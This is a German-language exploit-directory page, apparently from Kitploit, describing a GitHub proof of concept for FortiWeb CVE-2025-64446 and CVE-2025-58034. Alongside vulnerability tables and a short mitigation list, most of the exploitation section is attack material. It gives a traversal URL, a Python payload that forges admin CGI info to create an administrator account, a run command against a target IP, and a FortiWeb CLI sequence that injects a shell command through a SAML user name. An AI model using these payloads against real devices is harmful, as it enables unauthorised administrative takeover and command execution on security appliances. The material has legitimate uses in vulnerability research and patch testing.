Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
FORTIWEB_CVE-2025-64446-58034 — PoC-Exploit für FortiWeb CVEs: Authentifizierungsumgehung durch Path-Traversal und authentifizierte OS-Befehlsinjektion. Enthält detaillierte Analyse, Payloads und Leitfaden zur Schadensbegrenzung für Sicherheitstests. | Kitploit
Tools/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

PoC-Exploit für FortiWeb CVEs: Authentifizierungsumgehung durch Path-Traversal und authentifizierte OS-Befehlsinjektion. Enthält detaillierte Analyse, Payloads und Leitfaden zur Schadensbegrenzung für Sicherheitstests.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
4vor 5 MonatenNoch nicht geprüft

Simulation der Ausnutzung von FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Hinweis:

  • Dieses Dokument dient ausschließlich zu Lern- und Sicherheitsforschungszwecken.
  • Nicht verwenden, um Systeme ohne Genehmigung anzugreifen.

1. Übersicht

FortiWeb ist ein Web Application Firewall (WAF)-Gerät zum Schutz von Webanwendungen.

Im Jahr 2025 wurden zwei schwerwiegende Schwachstellen entdeckt:

  • CVE-2025-64446 – Authentifizierungsumgehung durch Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. Übersicht über CVE-2025-64446

KategorieInhalt
SchwachstellentypRelative Path Traversal
Authentifizierungsumgehung
UrsacheFortiWeb behandelt Pfade vor der Authentifizierung unsicher:

- Zugriffskontrolle basierend auf logischen Pfadstrings
- Keine vollständige Normalisierung der Pfade
- Erlaubt die Verwendung von ../ zum Zugriff auf interne Ressourcen
BeschreibungEinige administrative Endpunkte können ohne gültige Authentifizierung aufgerufen werden
Auswirkungen- Vollständige Authentifizierungsumgehung
- Unbefugter Zugriff auf Admin-Funktionen
- Durchbrechung des Berechtigungsmodells
Betroffene Versionen- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Beispiel:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Übersicht über CVE-2025-58034


4. Experimenteller Prozess (POC)

4.1. Umgebungsvorbereitung:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Dies hilft, Bibliothekskonflikte zu vermeiden, die Stabilität der Arbeitsumgebung zu gewährleisten und Auswirkungen auf das System zu minimieren.

venv-git

4.2 Ausnutzung

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Ausführen des Tools mit Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: Die IP-Adresse ist hier der Hostname des FortiWeb-Geräts.

exploit

Erhalt von Benutzername und Passwort -> Durchführung der Anmeldung

login

connect

Erfolgreiche Ausnutzung und Erstellung eines neuen Kontos mit Admin-Rechten.

4.3 Ausnutzung von CVE-2025-58034 nach der Kontoanmeldung

Nach erfolgreicher Anmeldung mit dem neu erstellten Administratorkonto kann der Angreifer die authentifizierte Befehlsinjektionsschwachstelle durch speziell gestaltete Anfragen oder direkt über die FortiWeb CLI ausnutzen:

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb wird die Konfigurationszeichenfolge verlassen und den Befehl id während der SAML-Benutzerkonfiguration ausführen.

5. Einige Maßnahmen zur Minderung der Schwachstellen

  • Aktualisieren Sie FortiWeb auf eine gepatchte Version.
  • Beschränken Sie den Zugriff auf die Verwaltungsoberfläche.
  • Setzen Sie die Verwaltungsschnittstelle nicht dem Internet aus.
  • Überprüfen Sie auf ungewöhnliche Admin-Konten.

6. Zusätzliche Referenzen

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Tool herunterladen
KategorieInhalt
SchwachstellentypOS Command Injection (CWE-78)
UrsacheFortiWeb verarbeitet Eingaben unsicher bei der Ausführung von Betriebssystembefehlen:

- Keine Eingabevalidierung
- Fehlendes Escapen von Sonderzeichen
- Direkte Übergabe von Benutzerdaten an Systembefehle
BeschreibungDie Schwachstelle erfordert Authentifizierung, erlaubt jedoch das Einschleusen von Systembefehlen
Auswirkungen- Unbeabsichtigte Befehlsausführung
- Zugriff auf Systemressourcen
- Beeinträchtigung von Integrität und Verfügbarkeit
Betroffene Versionen- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11